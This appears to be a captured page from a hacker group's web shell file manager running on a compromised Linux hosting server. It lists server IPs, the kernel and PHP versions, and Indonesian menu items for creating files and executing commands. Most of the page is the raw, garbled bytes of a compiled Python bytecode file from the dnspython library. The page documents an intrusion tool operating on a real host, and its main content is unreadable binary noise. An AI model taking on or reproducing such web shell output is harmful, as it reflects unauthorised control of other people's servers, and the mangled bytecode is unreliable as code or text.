⚝
One Hat Cyber Team
⚝
Your IP:
3.144.137.236
Server IP:
97.74.87.16
Server:
Linux 16.87.74.97.host.secureserver.net 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64
Server Software:
Apache
PHP Version:
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
python3.9
/
site-packages
/
dns
/
__pycache__
/
View File Name :
namedict.cpython-39.opt-1.pyc
a �M�e� � @ s, d Z ddlmZ ddlZG dd� de�ZdS )zDNS name dictionary� )�MutableMappingNc sh e Zd ZdZg d�Z� fdd�Zdd� Zdd� Zd d � Zdd� Z d d� Z dd� Zdd� Zdd� Z � ZS )�NameDictz�A dictionary whose keys are dns.name.Name objects. In addition to being like a regular Python dictionary, this dictionary can also get the deepest match for a given key. )� max_depth�max_depth_itemsZ__storec s6 t � �� t� | _d| _d| _| �t|i |��� d S )Nr )�super�__init__�dict�_NameDict__storer r �update)�self�args�kwargs�� __class__� �0/usr/lib/python3.9/site-packages/dns/namedict.pyr - s zNameDict.__init__c C s>